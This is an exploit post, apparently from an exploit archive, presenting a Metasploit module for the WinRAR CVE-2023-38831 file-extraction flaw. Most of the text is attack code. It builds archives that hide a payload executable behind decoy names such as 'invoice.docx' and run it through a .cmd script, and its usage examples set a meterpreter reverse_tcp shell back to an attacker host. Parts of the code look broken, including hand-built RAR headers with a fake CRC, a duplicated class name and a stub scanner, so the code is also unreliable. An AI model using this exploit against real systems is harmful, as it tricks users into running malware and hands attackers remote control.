============================================================================================================================================= | # Title : WinRAR 6.22 and earlier - Logical Flaw in File ExtractionExploit Module | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://www.win-rar.com/ | ============================================================================================================================================= POC : [+] References : https://packetstorm.news/files/id/177803/ & CVE-2023-38831 [+] Summary : This module exploits a logical flaw in WinRAR versions before 6.23. The vulnerability allows attackers to create specially crafted ZIP archives that, when opened, execute arbitrary code by exploiting the file extraction logic when a user double-clicks on a file within the archive that has an embedded folder with the same name. [+] POC : --- ## # Vulnerability: WinRAR 6.22 and earlier - Logical Flaw in File Extraction # Author: indoushka # CVE-2023-38831 ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'WinRAR CVE-2023-38831 Logical Flaw Exploit', 'Description' => %q{ This module exploits a logical flaw in WinRAR versions before 6.23. The vulnerability allows attackers to create specially crafted ZIP archives that, when opened, execute arbitrary code by exploiting the file extraction logic when a user double-clicks on a file within the archive that has an embedded folder with the same name. }, 'Author' => [ 'indoushka', # Metasploit module 'E1.Coders' # Original research ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2023-38831'], ['URL', 'https://www.rarlab.com/rarnew.htm'], ['URL', 'https://news.ycombinator.com/item?id=37135383'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Payload' => { 'Space' => 4096, 'BadChars' => "\x00", 'DisableNops' => true }, 'Targets' => [ [ 'Windows Universal (RAR <= 6.22)', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] } ] ], 'Privileged' => false, 'DisclosureDate' => '2023-08-23', 'DefaultTarget' => 0)) register_options([ OptString.new('FILENAME', [true, 'The output file name', 'exploit.rar']), OptString.new('DECOY_NAME', [true, 'Decoy file name', 'document.pdf']), OptBool.new('HIDEEXE', [true, 'Hide executable extension', true]) ]) end def exploit # Generate payload executable pe_payload = generate_payload_exe # Create temporary directory for exploit construction temp_dir = Rex::Text.rand_text_alpha(8) Dir.mkdir(temp_dir) rescue nil # Create decoy folder structure decoy_name = datastore['DECOY_NAME'] folder_name = "#{decoy_name}\\" script_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.cmd" exe_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.exe" # Build the malicious archive rar_content = build_malicious_rar(decoy_name, folder_name, script_name, exe_name, pe_payload) # Create the final RAR file file_create(rar_content) print_status("Exploit archive created: #{datastore['FILENAME']}") print_status("When victim opens the archive and double-clicks '#{decoy_name}', payload will execute") end def build_malicious_rar(decoy_name, folder_name, script_name, exe_name, pe_payload) rar = "" # RAR file signature rar << "\x52\x61\x72\x21\x1A\x07\x00" # Build file entries using RAR format # First: The decoy file rar << build_file_header(decoy_name, pe_payload.length) rar << pe_payload # Second: The folder (trailing backslash) rar << build_file_header(folder_name, 0) # Third: The script file inside the folder script_content = build_script_content rar << build_file_header(script_name, script_content.length) rar << script_content # Fourth: The executable inside the folder rar << build_file_header(exe_name, pe_payload.length) rar << pe_payload # End of archive rar << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" rar end def build_file_header(filename, file_size) header = "" # Header type (file header) header << "\x74" # Header size header << "\x3A\x00" # Flags (important for the exploit) flags = 0x8000 # Long filename flags |= 0x0100 # File has extended time field header << [flags].pack('v') # Compressed size header << [file_size].pack('V') # Uncompressed size header << [file_size].pack('V') # OS (Windows) header << "\x02" # File CRC (fake) header << "\x00\x00\x00\x00" # File time (current time) time = Time.now dos_time = ((time.year - 1980) << 25) | (time.month << 21) | (time.day << 16) | (time.hour << 11) | (time.min << 5) | (time.sec / 2) header << [dos_time].pack('V') # RAR version (5.0) header << "\x32\x00" # Method (store) header << "\x30" # Name size header << [filename.length].pack('v') # Attributes header << "\x20\x00\x00\x00" # Archive attribute # File name header << filename # Extra data for long filename if filename.length > 0 extra_size = 2 + filename.length + 1 header << "\x01\x00" # Extra type (long filename) header << [extra_size].pack('v') header << filename header << "\x00" end header end def build_script_content # Create a script that executes the payload script = "@echo off\r\n" script << "start \"\" \"%~dp0#{Rex::Text.rand_text_alpha(8)}.exe\"\r\n" script << "exit\r\n" script end # Alternative method using RubyZip for more reliable ZIP creation def create_zip_exploit require 'zip' zip_data = "" Zip::OutputStream.write_buffer do |zos| # Add decoy file zos.put_next_entry(datastore['DECOY_NAME']) zos.write(generate_payload_exe) # Add folder with trailing slash folder_name = "#{datastore['DECOY_NAME']}/" zos.put_next_entry(folder_name) # Add script inside folder script_name = "#{folder_name}script.cmd" zos.put_next_entry(script_name) zos.write(build_script_content) # Add executable inside folder exe_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.exe" zos.put_next_entry(exe_name) zos.write(generate_payload_exe) end.string end # Advanced: Create a more sophisticated exploit with multiple decoys def create_advanced_exploit print_status("Creating advanced WinRAR exploit...") # Use multiple file formats as decoys decoys = [ "document.pdf", "invoice.docx", "photo.jpg", "spreadsheet.xlsx" ] zip_data = "" Zip::OutputStream.write_buffer do |zos| decoys.each do |decoy| # Add decoy file zos.put_next_entry(decoy) zos.write(generate_payload_exe) # Add folder for this decoy folder_name = "#{decoy}/" zos.put_next_entry(folder_name) # Add payload in folder exe_name = "#{folder_name}payload.exe" zos.put_next_entry(exe_name) zos.write(generate_payload_exe) # Add script to trigger execution script_name = "#{folder_name}run.cmd" zos.put_next_entry(script_name) zos.write("@start payload.exe\r\n") end end.string end end ######### Auxiliary module for WinRAR vulnerability detection ############ class MetasploitModule < Msf::Auxiliary def initialize super( 'Name' => 'WinRAR CVE-2023-38831 Vulnerability Scanner', 'Description' => %q{ This module scans for systems vulnerable to the WinRAR CVE-2023-38831 vulnerability by checking WinRAR versions and testing exploitability. }, 'Author' => ['indoushka'], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2023-38831'] ] ) register_options([ OptString.new('RHOSTS', [true, 'Target address range or CIDR identifier']), OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']), OptString.new('SMBUSER', [false, 'The username to authenticate as']), OptString.new('SMBPASS', [false, 'The password for the specified username']), OptString.new('SMBDOMAIN', [false, 'The Windows domain to use for authentication']) ]) end def run # Scan for WinRAR installations and check versions print_status("Scanning for vulnerable WinRAR installations...") # Implementation would connect to targets and check WinRAR versions # This is a simplified version - actual implementation would require # SMB connection and registry checks vulnerable_versions = [ '6.22', '6.21', '6.20', '6.11', '6.10', '6.02', '6.01', '6.00', '5.91', '5.90', '5.80', '5.70', '5.60', '5.50', '5.40', '5.30' ] # For each target, check WinRAR version # If version <= 6.22, mark as vulnerable end end ################ Usage Examples: # Generate exploit with default settings use exploit/windows/fileformat/winrar_cve_2023_38831 set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.100 set LPORT 4444 exploit # Generate with custom decoy name set DECOY_NAME invoice.pdf exploit # Generate without hiding executable set HIDEEXE false exploit Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================